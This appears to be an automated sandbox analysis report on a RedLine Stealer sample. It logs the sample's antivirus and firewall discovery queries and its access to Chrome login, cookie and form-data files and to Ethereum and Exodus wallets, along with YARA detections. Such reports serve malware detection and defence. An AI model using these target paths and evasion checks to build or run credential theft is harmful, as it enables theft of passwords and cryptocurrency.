Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Users\user\AppData\Roaming\325.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400C22A8 GetLocalTime, 0_2_00000001400C22A8
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004F760 GetComputerNameW,GetUserNameW, 0_2_000000014004F760
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140001270 GetModuleHandleW,GetProcAddress,GetVersionExW, 0_2_0000000140001270
Source: C:\Users\user\AppData\Roaming\325.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)
Source: 325.exe, 0000000E.00000002.362916266.0000000000EDE000.00000004.00000020.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Roaming\325.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\325.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\325.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\325.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\325.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\325.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information:

Yara detected RedLine Stealer
Source: Yara match File source: 2.2.325.exe.3b45a60.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.325.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.325.exe.3b45a60.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.306874811.0000000003A20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 325.exe PID: 1784, type: MEMORY
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: 325.exe PID: 1784, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\325.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\325.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Roaming\325.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Roaming\325.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Roaming\325.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
OS version to string mapping found (often used in BOTs)
Source: kS2dqbsDwD.exe Binary or memory string: WIN_XP
Source: kS2dqbsDwD.exe, 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Binary or memory string: ?*A Goto/Gosub must not jump into a block that doesn't enclose it.ddddddd%02d%dmsSlowInputThenPlayLogoffSingle1.1.23.05\AutoHotkey.exeWIN32_NTWIN_XPWIN_7WIN_8.1WIN_8WIN_VISTAWIN_2003%04hXcomspecAppStartingArrowCrossIBeamNoUncheckChooseChooseStringEnabledVisibleShowDropDownHideDropDownTabLeftTabRightEditPasteCheckedFindStringChoiceLineCountCurrentLineCurrentColadvapi32RunAs: Missing advapi32.dll.CreateProcessWithLogonWCreateProcessWithLogonW.0.0.0.0&CombowininetInternetOpenWInternetOpenUrlWInternetCloseHandleInternetReadFileExAInternetReadFilewbThe maximum number of Folder Dialogs has been reached.Select Folder - %sshell32SHEmptyRecycleBinW%u.%u.%u.%u\*.*SeShutdownPrivilegeCreateToolhelp32SnapshotProcess32FirstWProcess32NextWComObjTypenameiidNo valid COM object!0x%08X -
Source: kS2dqbsDwD.exe Binary or memory string: WIN_VISTA
Source: kS2dqbsDwD.exe Binary or memory string: WIN_7
Source: kS2dqbsDwD.exe Binary or memory string: WIN_8
Source: kS2dqbsDwD.exe Binary or memory string: WIN_8.1
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: 325.exe PID: 1784, type: MEMORY

Remote Access Functionality:

Yara detected RedLine Stealer
Source: Yara match File source: 2.2.325.exe.3b45a60.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.325.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.325.exe.3b45a60.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.306874811.0000000003A20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 325.exe PID: 1784, type: MEMORY
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: 325.exe PID: 1784, type: MEMORY
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140017E10 Shell_NotifyIconW,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyCursor,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyCursor,DestroyCursor,IsWindow,DestroyWindow,DeleteObject,RemoveClipboardFormatListener,ChangeClipboardChain,mciSendStringW,mciSendStringW,RtlDeleteCriticalSection,OleUninitialize, 0_2_0000000140017E10
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140058440 RemoveClipboardFormatListener,ChangeClipboardChain, 0_2_0000000140058440
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140018920 AddClipboardFormatListener,PostMessageW,SetClipboardViewer,RemoveClipboardFormatListener,ChangeClipboardChain, 0_2_0000000140018920